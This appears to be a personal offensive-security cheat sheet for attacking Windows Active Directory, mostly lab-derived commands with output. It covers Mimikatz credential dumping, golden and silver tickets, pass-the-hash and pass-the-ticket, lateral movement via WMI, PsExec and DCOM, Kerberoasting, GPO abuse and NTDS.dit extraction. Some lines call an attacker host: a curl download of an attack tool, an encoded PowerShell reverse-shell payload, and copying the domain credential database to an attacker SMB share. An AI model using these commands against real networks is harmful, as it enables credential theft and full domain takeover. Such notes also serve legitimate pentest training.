Windows
SMB - 445
shares
list all shares
C:\Users\student>net view \\dc01 /all
Shared resources at \\dc01
Share name Type Used as Comment
-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
The command completed successfully.Mimikatz Commands
#save all output in a file
logsilver ticket
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadminsid: sid of the domain we can determine it with whoami /user
dumping lsass
privilege::debug
lsadump::lsa /patchlogin session dump
sekurlsa::logonpasswordsdcync
lsadump::dcsync /user:corp\daveextract kerberos tickets
sekurlsa::tickets /exportdumping sam
#elevate priv to nt/system
token::elevate
lsadump::samdumping Secrets : decrypt secrets stored in the registry
token::elevate
lsadump::secretsExtract passwords from windows Vault
vault::cred /patch
vault::listextract cached credentials
lsadump::cache
token::revertwdigest
sekurlsa::wdigestone line command
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "lsadump::sam" "exit"GMSAPassword Abuse
GMSAPasswordReader.exe
GMSAPasswordReader.exe.\RunasCs.exe tbrady 543BOMBOMBUNmanda -l 2 "\programdata\GMSAPasswordReader.exe --accountname delegator$"
[*] Warning: The logon for user 'tbrady' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token. Calculating hashes for Old Value
[*] Input username : delegator$
[*] Input domain : REBOUND.HTB [*] Salt : REBOUND.HTBdelegator$
*] rc4_hmac : 8689904D05752E977A546E201D09E724
[*] aes128_cts_hmac_sha1 : BA45C8A99C448C63FBA3C5E9C433BF51
[*] aes256_cts_hmac_sha1 : 6D0D5523515AC20557EF075F15462EEDFEC8D649A3E84DBC298FF73B7C720F72
[*] des_cbc_md5 : 3192102AC4A10EAD Calculating hashes for Current Value
[*] Input username : delegator$
[*] Input domain : REBOUND.HTB
[*] Salt : REBOUND.HTBdelegator$
[*] rc4_hmac : E1630B0E18242439A50E9D8B5F5B7524
[*] aes128_cts_hmac_sha1 : 2498DB6793463D13F5EBEA04EFC110A0
[*] aes256_cts_hmac_sha1 : 63EFD5D889B3006863B1E22A8EB92743B1B77D19C34AA9BB379F11AB65FA9771
[*] des_cbc_md5 : 62FE0EEA868F4FCELateral Movement
WMI and Winrm
wmic
wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 752;
ReturnValue = 0;
};New-CimSessionOption
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$command = 'calc';run the command
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};PSremoting
#without creds but local admin required
Enable-PSRemoting -Force
#without creds but specify hostname
Enter-PsSession -ComputerName <computer>
#authenticated enter PSsession
$password= ConvertTo-SecureString "Password@123" -AsPlainText
$cred = new-object System.Management.Automation.PSCredential
("INLANEFREIGHT\forend", $password)
Enter-PSSession -CompputerName ACADEMY-EA-DB01 -Credential $cred
Invoke-Command -ComputerName <computer> -Credential <user> -ScriptBlock {whoami}
Invoke-Command -ScriptBlock {whoami;hostname} -Credential <user> -ComputerName (Get-Content .\Desktop\computerlist.txt)
Invoke-Command -FilePath <path\script.ps1> -Credential <user> -ComputerName (Get-Content .\Desktop\computerlist.txt) or -Session <$sess>Runas
runas /netonly /user:User_nameRunasCS
suppose we have a user which don't have access to machine over any protocols and we want to get a session as this user and without spawning a new terminal, In this case we can use RunasCS.
using RunasCs exe
RunasCs.exe backdoor Password123 "C:/Users/Public/reverse.exe" --force-profile --logon-type 8using RunasCs poweshell
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"PSExec
./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
FILES04
C:\Windows\system32>whoami
corp\jenADMIN$ share must be available
Pass the Hash
wmiexec
wmiexec.exe -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73Overpass the Hash
mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
user : jen
domain : corp.com
program : powershell
impers. : no
NTLM : 369def79d8372408bf6e93364cc93075
| PID 8716
| TID 8348
| LSA Process is now R/W
| LUID 0 ; 16534348 (00000000:00fc4b4c)
\_ msv1_0 - data copy @ 000001F3D5C69330 : OK !
\_ kerberos - data copy @ 000001F3D5D366C8
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ *Password replace @ 000001F3D5C63B68 (32) -> nullconfirm the ticket was loaded
PS C:\Windows\system32> klist
Current LogonId is 0:0x17239e
Cached Tickets: (2)
#0> Client: jen @ CORP.COM
Server: krbtgt/CORP.COM @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 2/27/2023 5:27:28 (local)
End Time: 2/27/2023 15:27:28 (local)
Renew Time: 3/6/2023 5:27:28 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC1.corp.com
#1> Client: jen @ CORP.COM
Server: cifs/files04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 2/27/2023 5:27:28 (local)
End Time: 2/27/2023 15:27:28 (local)
Renew Time: 3/6/2023 5:27:28 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC1.corp.comPS C:\Windows\system32> cd C:\tools\SysinternalsSuite\
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\files04 cmd
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
corp\jen
C:\Windows\system32>hostname
FILES04Pass the Ticket
mimikatz
mimikatz #privilege::debug
Privilege '20' OK
mimikatz #sekurlsa::tickets /export
Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session : Batch from 0
User Name : dave
Domain : CORP
Logon Server : DC1
Logon Time : 9/14/2022 6:24:17 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1103
* Username : dave
* Domain : CORP.COM
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
Target Name (02) : krbtgt ; CORP ; @ CORP.COM
Client Name (01) : dave ; @ CORP.COM ( CORP )
Flags 40c10000 : name_canonicalize ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1f1626]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi !
...PS C:\Tools> dir *.kirbi
Directory: C:\Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/14/2022 6:24 AM 1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;12bd0]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a---- 9/14/2022 6:24 AM 1561 [0;1c6860]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;1c6860]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a---- 9/14/2022 6:24 AM 1561 [0;1c7bcc]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;1c7bcc]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a---- 9/14/2022 6:24 AM 1561 [0;1c933d]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;1c933d]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a---- 9/14/2022 6:24 AM 1561 [0;1ca6c2]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;1ca6c2]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
...mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
* File: '[0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi': OKPS C:\Tools> klist
Current LogonId is 0:0x13bca7
Cached Tickets: (1)
#0> Client: dave @ CORP.COM
Server: cifs/web04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
Start Time: 9/14/2022 5:31:32 (local)
End Time: 9/14/2022 15:31:13 (local)
Renew Time: 9/21/2022 5:31:13 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:PS C:\Tools> ls \\web04\backup
Directory: \\web04\backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2022 2:52 AM 0 backup_schemata.txtDCOM
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")C:\Users\Administrator>tasklist | findstr "calc"
win32calc.exe 4764 Services 0 12,132 K$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")LDAP
Determine Domain controller in a domain
nslookup -type=SRV _ldap._tcp.dc._msdcs.SKYLARK.com
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 10.10.181.250
_ldap._tcp.dc._msdcs.SKYLARK.com SRV service location:
priority = 0
weight = 100
port = 389
svr hostname = dc.skylark.com
dc.skylark.com internet address = 10.10.181.250bloodHound
check fist if we have any valid ticket on the machine
klist
#if not run a cmd with creeds of a compromised user (load creds in memory)
runas /netonly /user:domain.local\user powershellpowershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethods All -zipfilename output -outputdirectory c:\
-ldapUsername
-ldapPassword
SharpHound.exe --CollectionMethods All --ZipFileName output.zipKerberos
Kerberoasting
rebeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoastInvoke
.\Invoke-Kerberoast.ps1Abusing GPO
.\powerview.ps1
Get-GPO -Name "Default Domain Policy"
Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh
curl http://192.168.45.176:8000/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
gpupdate /forceDumping ntds
wbadmin
first you need to set up and smb server using that support NTFS
1-configure samba server with authentication
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
interfaces = tun0
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser2- Create a new user that matches the user in the force user parameter
adduser smbuser
smbpasswd -a smbuser3- Test connection in windows machine
net use k: \\10.10.14.3\smb /user:smbuser smbpass4- Backup NTDS
echo "Y" | wbadmin start backup -backuptarget:\\10.10.14.3\smb -include:c:\windows\ntds5-Next, retrieve the version of the backup.
wbadmin get versions6-We can now restore the NTDS.dit file, specifying the backup version.
echo "Y" | wbadmin start recovery -version:10/01/2020-14:23 -itemtype:file - items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl7- We need to export the system hive too, and transfer both this and the NTDS.dit to our local machine.
reg save HKLM\SYSTEM C:\system.hive8- Copy files to our kali
cp ntds.dit \\10.10.14.3\smb\NTDS.dit
cp system.hive \\10.10.14.3\smb\system.hive9- Dump NTDS.dit
secretsdump.py -ntds NTDS.dit -system system.hive LOCAL -historyPowershell
NTDSUtil
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
#dumping ntds localey
secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCALLast updated
Was this helpful?
